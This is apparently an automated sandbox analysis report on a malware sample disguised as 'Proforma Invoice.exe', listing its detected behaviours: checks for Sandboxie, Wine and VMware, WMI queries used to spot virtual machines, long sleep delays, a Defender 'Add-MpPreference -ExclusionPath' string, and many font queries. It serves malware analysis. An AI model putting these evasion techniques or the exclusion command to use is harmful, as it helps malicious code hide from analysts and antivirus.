                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 0.2.Proforma Invoice.exe.25f0050.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 6844, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: Proforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: Proforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 6928Thread sleep time: -45834s >= -30000s
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 6900Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 6520Thread sleep time: -12912720851596678s >= -30000s
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 2336Thread sleep count: 1241 > 30
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 2336Thread sleep count: 8607 > 30
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeWindow / User API: threadDelayed 1241
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeWindow / User API: threadDelayed 8607
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 45834
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 922337203685477
                      Source: Proforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: Proforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Proforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: Proforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 4_2_0129CC08 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe
                      Source: Proforma Invoice.exe, 00000004.00000002.561875686.00000000017E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: Proforma Invoice.exe, 00000004.00000002.561875686.00000000017E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: Proforma Invoice.exe, 00000004.00000002.561875686.00000000017E0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: Proforma Invoice.exe, 00000004.00000002.561875686.00000000017E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Users\user\Desktop\Proforma Invoice.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
